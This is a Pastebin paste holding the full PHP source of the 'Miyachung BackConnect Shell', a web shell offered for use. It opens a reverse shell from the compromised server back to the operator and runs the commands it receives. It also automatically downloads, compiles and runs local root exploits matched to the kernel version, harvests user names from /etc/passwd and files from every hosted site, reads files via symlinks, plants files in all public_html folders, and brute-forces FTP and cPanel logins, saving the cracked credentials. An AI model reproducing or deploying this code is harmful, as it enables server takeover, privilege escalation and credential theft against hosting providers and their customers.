API tools faq
paste
Advertisement
Guest User

oi

a guest
Apr 5th, 2017
115
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.81 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /*
  3. ===================================================================
  4. .__ .__
  5. _____ |__|___.__._____ ____ | |__ __ __ ____ ____
  6. / \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
  7. | Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
  8. |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
  9. \/ \/ \/ \/ \/ \//_____/
  10. ===================================================================
  11. . Miyachung BackConnect Shell
  12. . Written by Miyachung
  13. . Janissaries.Org
  14. . Contact: miyachung@hotmail
  15. . Video : https://www.youtube.com/watch?v=sWUR9gt4ia0
  16. Commands works with shell_exec() function
  17.  
  18. @ Options
  19. - exploit = Automatic Search & Download & Run a local root exploit which matches with kernel release
  20. - grabusr = Grab users from /etc/passwd and save into a file ( users )
  21. - domains = List domains from /var/named
  22. - getf = Find and grab the name given file from all public_html dirs ( only works with /home/USER/public_html servers )
  23. - catln = Cat file with ln -s method
  24. - index = Try copy the name given file to all public_html dirs ( only works with /home/USER/public_html servers )
  25. - home = Change dir into home folder
  26. - ftp = Performs ftp brute-force attack to all users from /etc/passwd ( only works with /home/USER/public_html servers )
  27. - cpanel = Performs cpanel brute-force attack to all users from /etc/passwd ( only works with /home/USER/public_html servers )
  28. */
  29. ob_start();
  30. $server_ip = $_SERVER['SERVER_ADDR'];
  31. $your_ip = getenv('REMOTE_ADDR');
  32. $your_port = 443;
  33. $timeout = 5;
  34.  
  35. if(!empty($server_ip) && !empty($your_ip) && !empty($your_port) && !empty($timeout))
  36. {
  37. $create = new BC($your_ip,$your_port,$server_ip,$timeout);
  38. }
  39. /*
  40. @ Connection Class
  41. */
  42. class BC
  43. {
  44. private $your_ip;
  45. private $your_port;
  46. private $server_ip;
  47. private $timeout;
  48. private $homefolder;
  49. public function __construct($yip,$yp,$sip,$t)
  50. {
  51. $this->your_ip = $yip;
  52. $this->your_port = $yp;
  53. $this->server_ip = $sip;
  54. $this->timeout = $t;
  55. print("<title>Miyachung BackConnect Shell</title>");
  56. print("<strong>Miyachung BackConnect Shell</strong>\n<br>");
  57. print("Your ip is <strong>$this->your_ip</strong>\n<br>");
  58. print("Your port is <strong>$this->your_port</strong>\n<br>");
  59. print("Server ip is <strong>$this->server_ip</strong>\n<br>");
  60. print("Timeout seconds <strong>$this->timeout</strong>\n\n<br><br>");
  61.  
  62. print("Trying to create shell process <strong>$this->your_ip</strong> with <strong>$this->your_port</strong> on <strong>$this->server_ip</strong>\n<br>");
  63. ob_flush(); flush();
  64. $this->createshell();
  65. }
  66. private function createshell()
  67. {
  68. $socket = @fsockopen($this->your_ip,$this->your_port,$errno,$errstr,$this->timeout) or die("<font color='red'>Unfortunately could not spawn shell</font>\n<br>");
  69. print("<font color='green'>Shell process opened to <strong>$this->server_ip</strong> > <strong>$this->your_ip:$this->your_port</strong></font>\n<br>");
  70. ob_flush(); flush();
  71. fwrite($socket,"=============================================================");
  72. fwrite($socket,"
  73. .__ .__
  74. _____ |__|___.__._____ ____ | |__ __ __ ____ ____
  75. / \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
  76. | Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
  77. |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
  78. \/ \/ \/ \/ \/ \//_____/
  79. ");
  80. fwrite($socket,"Welcome to the BackConnect Shell !!\n");
  81. fwrite($socket,"Written by Miyachung\n");
  82. fwrite($socket,"Informations\n");
  83. fwrite($socket,"------------------------------------------------\n");
  84. fwrite($socket,"uname -a: ".@shell_exec("uname -a"));
  85. fwrite($socket,"whoami: ".@shell_exec("whoami"));
  86. fwrite($socket,"id: ".@shell_exec("id"));
  87. fwrite($socket,"pwd: ".@shell_exec("pwd"));
  88. fwrite($socket,"@ Options\n\n");
  89. fwrite($socket,"- exploit = Automatic Search & Download & Run a local root exploit which matches with kernel release\n");
  90. fwrite($socket,"- grabusr = Grab users from /etc/passwd and save into a file ( users )\n");
  91. fwrite($socket,"- domains = List domains from /var/named\n");
  92. fwrite($socket,"- getf = Find and grab the name given file from all public_html dirs ( only works with /home/USER/public_html servers )\n");
  93. fwrite($socket,"- catln = Cat file with ln -s method\n");
  94. fwrite($socket,"- index = Try copy the name given file to all public_html dirs ( only works with /home/USER/public_html servers )\n");
  95. fwrite($socket,"- home = Change dir into home folder\n");
  96. fwrite($socket,"- ftp = Performs ftp brute-force attack to all users from /etc/passwd ( only works with /home/USER/public_html servers )\n");
  97. fwrite($socket,"- cpanel = Performs cpanel brute-force attack to all users from /etc/passwd ( only works with /home/USER/public_html servers )\n");
  98. $this->homefolder = trim(@shell_exec("pwd"));
  99. fwrite($socket,"=============================================================\n");
  100. $result= @shell_exec("whoami");
  101. fwrite($socket,$result);
  102. print "<font color='green'>Command whoami;</font>\n";
  103. print $result;
  104. ob_flush(); flush();
  105. preg_match("#([0-9]).([0-9]).([0-9]+)-([a-z0-9]+)#si",@shell_exec("uname -r"),$version);
  106. $version1 = $version[0];
  107. $version2 = $version[1].".".$version[2].".".$version[3];
  108. print "<pre>";
  109. while(1)
  110. {
  111. $enter = fgets($socket);
  112. if(preg_match('#exit#',$enter)){fwrite($socket,"Process closed\n");exit("Process closed");}
  113. if(preg_match('#exploit#',$enter)){$this->search($version1,$socket);$this->search($version2,$socket);}
  114. if(preg_match('#grabusr#',$enter)){$this->grab_users($socket);}
  115. if(preg_match('#catln (.+)#',$enter,$file)){$this->catln($file[1],$socket);}
  116. if(preg_match('#index (.+)#',$enter,$file)){$this->index($file[1],$socket);}
  117. if(preg_match('#getf (.+)#',$enter,$file)){$this->getf($file[1],$socket);}
  118. if(preg_match('#ftp (.+)#',$enter,$file)){$this->ftp($file[1],$socket);}
  119. if(preg_match('#cpanel (.+)#',$enter,$file)){$this->cpanel($file[1],$socket);}
  120. if(preg_match('#domains#',$enter)){$this->domains($socket);}
  121. if(eregi('home',$enter)){chdir($this->homefolder);}
  122. if(strpos($enter,'cd ..')){
  123. $curr = getcwd();
  124. $explode = explode("/",$curr);
  125. $c = count($explode);
  126. unset($explode[$c-1]);
  127. $explode = array_values(array_filter($explode));
  128. $path = implode("/",$explode);
  129. $path = "/".$path;
  130. if(!chdir($path)){fwrite($socket,"Can't chdir into $path : Permission denied\n");}
  131. }
  132. elseif(preg_match('#cd (.+)#',$enter,$dir)){
  133. $curr = getcwd();
  134. if(preg_match("#\/#si",$dir[1]))
  135. {
  136. if(!chdir($dir[1])){fwrite($socket,"Can't chdir into $dir[1] : Permission denied\n");}
  137. }
  138. else
  139. {
  140. if(!chdir($curr."/".$dir[1])){fwrite($socket,"Can't chdir into $curr/$dir[1] : Permission denied\n");}
  141. }
  142.  
  143. }
  144. $result= @shell_exec(trim($enter));
  145. fwrite($socket,$result);
  146. print "<font color='green'>Command ".trim($enter).";</font>\n";
  147. print $result;
  148. ob_flush(); flush();
  149. }
  150. print "</pre>";
  151. fclose($socket);
  152. }
  153. private function search($version,$socket)
  154. {
  155. fwrite($socket,"Release: $version\n");
  156. print("Release: $version\n<br>");
  157. ob_flush();flush();
  158. fwrite($socket,"Searching Exploit-DB for local root exploits..\n");
  159. print("Searching Exploit-DB for local root exploits..\n<br>");
  160. $exploit_db = $this->curl("http://www.exploit-db.com/search/?action=search&filter_description=$version");
  161. if(preg_match('/No results/si',$exploit_db))
  162. {
  163. fwrite($socket,"Not found any exploits\n");
  164. print("Not found any exploits\n<br>");
  165. ob_flush();flush();
  166. }
  167. else
  168. {
  169. fwrite($socket,"==================== Possible Exploits =====================\n");
  170. print("==================== Possible Exploits =====================\n<br>");
  171. ob_flush();flush();
  172. preg_match_all('#<td class="list_explot_description">(.*?)<\/td>#si',$exploit_db,$list);
  173. foreach($list[1] as $listx)
  174. {
  175. preg_match('#<a href="(.*?)">(.*?)<\/a>#si',$listx,$exploit);
  176. fwrite($socket,"[+] ".$exploit[2]."\n");
  177. print("[+] ".$exploit[2]."\n<br>");
  178. fwrite($socket,"Trying pwn this server with this exploit\n");
  179. print("Trying pwn this server with this exploit\n<br>");
  180. fwrite($socket,"Downloading => ".$exploit[1]."\n");
  181. print("Downloading => ".$exploit[1]."\n<br>");
  182. ob_flush();flush();
  183. $download = $this->download($exploit[1]);
  184. if($download != false)
  185. {
  186. fwrite($socket,"File downloaded saved as $download\n");
  187. print("File downloaded saved as $download\n<br>");
  188. fwrite($socket,"Trying compile to $download file\n");
  189. print("Trying compile to $download file\n<br>");
  190. ob_flush();flush();
  191. $withoutc = str_replace(".c","",$download);
  192. @shell_exec("gcc $download -o $withoutc");
  193. if(file_exists($withoutc))
  194. {
  195. fwrite($socket,"File compiled\n");
  196. print("File compiled\n<br>");
  197. fwrite($socket,"Setting chmod options\n");
  198. print("Setting chmod options\n<br>");
  199. @shell_exec("chmod +x $withoutc");
  200. fwrite($socket,"Running exploit..!\n");
  201. print("Running exploit..!\n<br>");
  202. ob_flush();flush();
  203. @shell_exec("./$withoutc");
  204. }
  205. else
  206. {
  207. fwrite($socket,"File doesn't compile\n");
  208. print("File doesn't compile\n<br>");
  209. ob_flush();flush();
  210. }
  211.  
  212. }
  213. else
  214. {
  215. fwrite($socket,"File doesn't download\n");
  216. print("File doesn't download\n<br>");
  217. ob_flush();flush();
  218. }
  219.  
  220. }
  221. fwrite($socket,"==================== Possible Exploits =====================\n");
  222. print("==================== Possible Exploits =====================\n<br>");
  223. ob_flush();flush();
  224. }
  225. fwrite($socket,"Searching 1337day for local root exploits..\n");
  226. print("Searching 1337day for local root exploits..\n<br>");
  227. ob_flush();flush();
  228. $day1337 = $this->curl("http://www.1337day.com/search","agree=Ok&dong=$version&submit_search=Submit");
  229. preg_match_all("#<a href='/exploit/description/(.*?)' >(.*?)<\/a>#si",$day1337,$exploits);
  230. if($exploits[1])
  231. {
  232. fwrite($socket,"==================== Possible Exploits =====================\n");
  233. print("==================== Possible Exploits =====================\n<br>");
  234. ob_flush();flush();
  235. foreach($exploits[1] as $i => $exploit)
  236. {
  237. fwrite($socket,"[+] ".$exploits[2][$i]."\n");
  238. print("[+] ".$exploits[2][$i]."\n<br>");
  239. fwrite($socket,"Trying pwn this server with this exploit\n");
  240. print("Trying pwn this server with this exploit\n<br>");
  241. $exploit_link = "http://www.1337day.com/exploit/$exploit";
  242. fwrite($socket,"Downloading => ".$exploit_link."\n");
  243. print("Downloading => ".$exploit_link."\n<br>");
  244. ob_flush();flush();
  245. $download = $this->day1337download($exploit_link);
  246. if($download != false)
  247. {
  248. fwrite($socket,"File downloaded saved as $download\n");
  249. print("File downloaded saved as $download\n<br>");
  250. fwrite($socket,"Trying compile to $download file\n");
  251. print("Trying compile to $download file\n<br>");
  252. ob_flush();flush();
  253. $withoutc = str_replace(".c","",$download);
  254. @shell_exec("gcc $download -o $withoutc");
  255. if(file_exists($withoutc))
  256. {
  257. fwrite($socket,"File compiled\n");
  258. print("File compiled\n<br>");
  259. fwrite($socket,"Setting chmod options\n");
  260. print("Setting chmod options\n<br>");
  261. @shell_exec("chmod +x $withoutc");
  262. fwrite($socket,"Running exploit..!\n");
  263. print("Running exploit..!\n<br>");
  264. ob_flush();flush();
  265. @shell_exec("./$withoutc");
  266. }
  267. else
  268. {
  269. fwrite($socket,"File doesn't compile\n");
  270. print("File doesn't compile\n<br>");
  271. ob_flush();flush();
  272. }
  273.  
  274. }
  275.  
  276. }
  277. fwrite($socket,"==================== Possible Exploits =====================\n");
  278. print("==================== Possible Exploits =====================\n<br>");
  279. ob_flush();flush();
  280. }
  281. else
  282. {
  283. fwrite($socket,"Not found any exploits\n");
  284. print("Not found any exploits\n<br>");
  285. ob_flush();flush();
  286. }
  287. }
  288. private function curl($site,$post=null)
  289. {
  290. $ch = curl_init();
  291. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  292. curl_setopt($ch,CURLOPT_URL,$site);
  293. if($post != null)
  294. {
  295. curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
  296. }
  297. $exec = curl_exec($ch);
  298. curl_close($ch);
  299. return $exec;
  300. }
  301. private function download($url)
  302. {
  303. preg_match('#\/exploits\/(.+)#si',$url,$filename);
  304. $filename = $filename[1].".c";
  305. $url = str_replace("exploits","download",$url);
  306. $openurl = @file_get_contents($url);
  307. if($openurl && file_put_contents($filename,$openurl)){
  308. return $filename;
  309. }
  310. else
  311. {
  312. return false;
  313. }
  314.  
  315. }
  316. private function day1337download($url)
  317. {
  318. preg_match('#\/exploit\/(.+)#si',$url,$filename);
  319. $filename = $filename[1].".c";
  320. $data = $this->curl($url,"agree=Ok");
  321. preg_match("#<pre class='brush: plain; tab-size: 8'>(.*?)<\/pre>#si",$data,$content);
  322. if(file_put_contents($filename,$content))
  323. {
  324. return $filename;
  325. }
  326. else
  327. {
  328. return false;
  329. }
  330.  
  331. }
  332. private function grab_users($socket)
  333. {
  334. $read = file("/etc/passwd");
  335. $x0x = "";
  336. foreach($read as $text)
  337. {
  338. $text = trim($text);
  339. $user = explode(":",$text);
  340. $user = $user[0];
  341. $xox .= $user."\r\n";
  342. fwrite($socket,$user."\n");
  343. print($user."\n");
  344. }
  345. fwrite($socket,"Grabbed ".count($read)." users from /etc/passwd\n");
  346. print("Grabbed ".count($read)." users from /etc/passwd\n");
  347. $save = $this->save_as("users",$xox,"wb");
  348. if($save){fwrite($socket,"Saved into file as 'users'\n");print("Saved into file as 'users'\n");}else{fwrite($socket,"Doesn't save into file\n");print("Doesn't save into file\n");}
  349. }
  350. private function catln($file,$socket)
  351. {
  352. $savefile = uniqid();
  353. @shell_exec("ln -s $file ".$savefile);
  354. if(file_exists($savefile))
  355. {
  356. fwrite($socket,file_get_contents($savefile));
  357. print(file_get_contents($savefile));
  358. fwrite($socket,"File name $savefile\n");
  359. print("File name $savefile\n");
  360. }
  361. else
  362. {
  363. fwrite($socket,"File doesn't read\n");
  364. print("File doesn't read\n");
  365. }
  366.  
  367. }
  368. private function index($file,$socket)
  369. {
  370. $etc = file('/etc/passwd');
  371. $count= 0;
  372. foreach($etc as $txt)
  373. {
  374. $txt = trim($txt);
  375. $user= explode(":",$txt);
  376. $user= $user[0];
  377. $path= "/home/$user/public_html/$file";
  378. @shell_exec("cp $file $path");
  379. if(file_exists($path))
  380. {
  381. fwrite($socket,"File created: ".$path."\n");
  382. print("File created: ".$path."\n");
  383. $count++;
  384. }
  385.  
  386. }
  387. fwrite($socket,"Completed\n");
  388. print("Completed\n");
  389. fwrite($socket,"File copied into $count dirs\n");
  390. print("File copied into $count dirs\n");
  391. }
  392. private function getf($file,$socket)
  393. {
  394. $etc = file('/etc/passwd');
  395. $count = 0;
  396. foreach($etc as $txt)
  397. {
  398. $txt = trim($txt);
  399. $user= explode(":",$txt);
  400. $user= $user[0];
  401. $path= "/home/$user/public_html/$file";
  402. if(file_exists($path))
  403. {
  404. fwrite($socket,"File found: ".$path."\n");
  405. print("File found: ".$path."\n");
  406. $content = file_get_contents($path);
  407. if($content)
  408. {
  409. $save = $this->save_as($user."-".$file,$content);
  410. if($save){
  411. fwrite($socket,"File is readable,saved into file named $user-$file\n");
  412. print("File is readable,saved into file named $user-$file\n");
  413. $count++;
  414. }
  415. else
  416. {
  417. fwrite($socket,"File is readable but current dir is not writable\n");
  418. print("File is readable but current dir is not writable\n");
  419. }
  420.  
  421. }
  422. else
  423. {
  424. @shell_exec("ln -s $path $user-$file");
  425. if(file_exists($user[0]."-".$file)){
  426. fwrite($socket,"File is read with ln -s method,saved into file named $user-$file\n");
  427. print("File is read with ln -s method,saved into file named $user-$file\n");
  428. $count++;
  429. }
  430. else
  431. {
  432. fwrite($socket,"File is not readable\n");
  433. print("File is not readable\n");
  434. }
  435.  
  436. }
  437.  
  438. }
  439.  
  440. }
  441. fwrite($socket,"Grabbed $count files\n");
  442. print("Grabbed $count files\n");
  443.  
  444. }
  445. private function domains($socket)
  446. {
  447. $x0x = "";
  448. $c = 0;
  449. $path = "/var/named";
  450. $dir_handle = @opendir($path);
  451. if($dir_handle)
  452. {
  453. while ($file = readdir($dir_handle))
  454. {
  455. if (!is_dir($path."/".$file) AND ($file != "..") AND ($file != ".")) {
  456. $dosya = str_replace(".db","",$file);
  457. fwrite($socket,$dosya."\n");
  458. print($dosya."\n");
  459. $x0x .= $dosya."\r\n";
  460. $c++;
  461. }
  462.  
  463. }
  464. $save = $this->save_as("d0mains",$x0x,"wb");
  465. if($save == false){fwrite($socket,"Got domains but can't save into a file this dir is not writable\n");print("Got domains but can't save into a file this dir is not writable\n");}
  466. else
  467. {
  468. fwrite($socket,"Grabbed $c domains\n");
  469. print("Grabbed $c domains\n");
  470. fwrite($socket,"Saved into 'd0mains'\n");
  471. print("Saved into 'd0mains'\n");
  472. }
  473. closedir($dir_handle);
  474. }
  475. else
  476. {
  477. fwrite($socket,"Doesn't read /var/named\n");
  478. print("Doesn't read /var/named\n");
  479. }
  480.  
  481. }
  482. private function ftp($wordlist,$socket)
  483. {
  484. fwrite($socket,"Starting ftp crack..\n");
  485. ob_flush();flush();
  486. $open = file($wordlist);
  487. $userx= array();
  488. foreach($open as $pwd)
  489. {
  490. $pwd = trim($pwd);
  491. fwrite($socket,"Password ".$pwd." trying on all users\n");
  492. ob_flush();flush();
  493. $users= file('/etc/passwd');
  494. foreach($users as $user)
  495. {
  496. $user = trim($user);
  497. $user = explode(":",$user);
  498. $user = $user[0];
  499. $userx[] = $user;
  500. }
  501. $userx = array_filter($userx);
  502. $userx = array_unique($userx);
  503. $userx = array_chunk($userx,25);
  504. $multi = curl_multi_init();
  505. foreach($userx as $u)
  506. {
  507. for($i=0;$i<=count($u)-1;$i++)
  508. {
  509. $curl[$i] = curl_init();
  510. curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1);
  511. curl_setopt($curl[$i],CURLOPT_URL,"ftp://".$this->server_ip);
  512. curl_setopt($curl[$i],CURLOPT_USERPWD,trim($u[$i]).":".$pwd);
  513. curl_setopt($curl[$i],CURLOPT_FOLLOWLOCATION,1);
  514. curl_setopt($curl[$i],CURLOPT_TIMEOUT,4);
  515. curl_multi_add_handle($multi,$curl[$i]);
  516. }
  517. do
  518. {
  519. curl_multi_exec($multi,$active);
  520. usleep(1);
  521. }while($active>0);
  522. foreach($curl as $cid => $cend)
  523. {
  524. $data[$cid] = curl_multi_getcontent($cend);
  525. if(preg_match('#drw#si',$data[$cid]))
  526. {
  527. fwrite($socket,"Found username: $u[$cid] , password: $pwd\n");
  528. print("<font color='red'>Found username: $u[$cid] , password: $pwd</font>\n");
  529. $save = $this->save_as("ftps.txt","Found username: $u[$cid] , password: $pwd\r\n","ab");
  530. ob_flush();flush();
  531. }
  532. else
  533. {
  534. fwrite($socket,"Not found $u[$cid]:$pwd\n");
  535. print("Not found $u[$cid]:$pwd\n");
  536. ob_flush();flush();
  537. }
  538. curl_multi_remove_handle($multi,$cend);
  539. }
  540. }
  541.  
  542. }
  543.  
  544. }
  545. private function cpanel($wordlist,$socket)
  546. {
  547. fwrite($socket,"Starting cpanel crack..\n");
  548. ob_flush();flush();
  549. $open = file($wordlist);
  550. $userx= array();
  551. foreach($open as $pwd)
  552. {
  553. $pwd = trim($pwd);
  554. fwrite($socket,"Password ".$pwd." trying on all users\n");
  555. ob_flush();flush();
  556. $users= file('/etc/passwd');
  557. foreach($users as $user)
  558. {
  559. $user = trim($user);
  560. $user = explode(":",$user);
  561. $user = $user[0];
  562. $userx[] = $user;
  563. }
  564. $userx = array_filter($userx);
  565. $userx = array_unique($userx);
  566. $userx = array_chunk($userx,25);
  567. $multi = curl_multi_init();
  568. foreach($userx as $u)
  569. {
  570. for($i=0;$i<=count($u)-1;$i++)
  571. {
  572. $curl[$i] = curl_init();
  573. curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1);
  574. curl_setopt($curl[$i],CURLOPT_URL,"https://$this->server_ip:2083/login/?login_only=1");
  575. curl_setopt($curl[$i],CURLOPT_POSTFIELDS,"user=".trim($u[$i])."&pass=$pwd");
  576. curl_setopt($curl[$i],CURLOPT_SSL_VERIFYPEER,0);
  577. curl_setopt($curl[$i],CURLOPT_SSL_VERIFYHOST,0);
  578. curl_setopt($curl[$i],CURLOPT_FOLLOWLOCATION,1);
  579. curl_setopt($curl[$i],CURLOPT_TIMEOUT,4);
  580. curl_multi_add_handle($multi,$curl[$i]);
  581. }
  582. do
  583. {
  584. curl_multi_exec($multi,$active);
  585. usleep(1);
  586. }while($active>0);
  587. foreach($curl as $cid => $cend)
  588. {
  589. $data[$cid] = curl_getinfo($cend);
  590. if($data[$cid]['http_code'] != 401)
  591. {
  592. fwrite($socket,"Found username: $u[$cid] , password: $pwd\n");
  593. print("<font color='red'>Found username: $u[$cid] , password: $pwd</font>\n");
  594. $save = $this->save_as("cpanels.txt","Found username: $u[$cid] , password: $pwd\r\n","ab");
  595. ob_flush();flush();
  596. }
  597. else
  598. {
  599. fwrite($socket,"Not found $u[$cid]:$pwd\n");
  600. print("Not found $u[$cid]:$pwd\n");
  601. ob_flush();flush();
  602. }
  603. curl_multi_remove_handle($multi,$cend);
  604. }
  605. }
  606.  
  607. }
  608.  
  609. }
  610. private function save_as($filename,$content,$type='ab')
  611. {
  612. $fopen = fopen($filename,$type);
  613. if($fopen)
  614. {
  615. fwrite($fopen,$content);
  616. fclose($fopen);
  617. return true;
  618. }
  619. else
  620. {
  621. return false;
  622. }
  623.  
  624. }
  625. }
  626. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!